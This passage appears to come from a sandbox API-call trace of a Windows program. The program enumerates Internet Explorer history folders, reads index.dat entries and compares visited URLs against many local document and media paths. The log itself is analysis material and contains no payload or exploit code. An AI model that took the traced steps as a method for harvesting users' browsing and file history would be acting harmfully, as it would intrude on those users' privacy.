_Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\" [0085.893] wcscat (in: _Dest=0x288400, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\." [0085.893] wcscmp (_String1=".", _String2="..") returned -1 [0085.893] wcscmp (_String1=".", _String2=".") returned 0 [0085.893] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.893] FindNextFileW (in: hFindFile=0x591b28, lpFindFileData=0x2881b0 | out: lpFindFileData=0x2881b0) returned 1 [0085.893] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.893] wcslen (_String="..") returned 0x2 [0085.893] wcscpy (in: _Dest=0x288400, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" [0085.893] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.893] wcscat (in: _Dest=0x288400, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\" [0085.893] wcscat (in: _Dest=0x288400, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\.." [0085.893] wcscmp (_String1="..", _String2="..") returned 0 [0085.893] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.893] FindNextFileW (in: hFindFile=0x591b28, lpFindFileData=0x2881b0 | out: lpFindFileData=0x2881b0) returned 1 [0085.893] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.893] wcslen (_String="index.dat") returned 0x9 [0085.893] wcscpy (in: _Dest=0x288400, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701" [0085.893] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701") returned 0x69 [0085.893] wcscat (in: _Dest=0x288400, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\" [0085.893] wcscat (in: _Dest=0x288400, _Source="index.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\index.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\index.dat" [0085.893] _wcsicmp (_String1="index.dat", _String2="index.dat") returned 0 [0085.893] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017063020170701\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017063020170701\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa4 [0085.899] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.899] ReadFile (in: hFile=0xa4, lpBuffer=0x287e80, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x281b48, lpOverlapped=0x0 | out: lpBuffer=0x287e80*, lpNumberOfBytesRead=0x281b48*=0x20, lpOverlapped=0x0) returned 1 [0085.914] GetFileSize (in: hFile=0xa4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8000 [0085.914] SetFilePointer (in: hFile=0xa4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5000 [0085.914] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.921] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.921] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x281b24, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b24*=0x100, lpOverlapped=0x0) returned 1 [0085.921] _strlwr (in: _Str="https://www.google.de/" | out: _Str="https://www.google.de/") returned="https://www.google.de/" [0085.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x285e0b, cbMultiByte=-1, lpWideCharStr=0x281b80, cchWideChar=8192 | out: lpWideCharStr="https://www.google.de/") returned 23 [0085.921] wcscmp (_String1="https://www.google.de/", _String2="https://www.google.de/") returned 0 [0085.921] SetFilePointer (in: hFile=0xa4, lDistanceToMove=20736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5100 [0085.921] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.921] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.921] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x281b24, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b24*=0x100, lpOverlapped=0x0) returned 1 [0085.921] _strlwr (in: _Str=":Host: www.msn.com" | out: _Str=":host: www.msn.com") returned=":host: www.msn.com" [0085.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x285e0b, cbMultiByte=-1, lpWideCharStr=0x281b80, cchWideChar=8192 | out: lpWideCharStr=":host: www.msn.com") returned 19 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="https://www.google.de/") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="http://www.msn.com/de-de/") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="https://support.microsoft.com/products/internet-explorer") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="https://www.microsoft.com/en-us/iegallery") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="http://www.iegallery.com/en/addons/") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="https://support.microsoft.com/en-us/products/internet-explorer") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="http://go.microsoft.com/fwlink/") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="https://support.microsoft.com/internet-explorer") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="http://www.msn.com/") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2=":host: computer") returned 1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned -1 [0085.922] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned -1 [0085.923] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned -1 [0085.924] wcscmp (_String1=":host: www.msn.com", 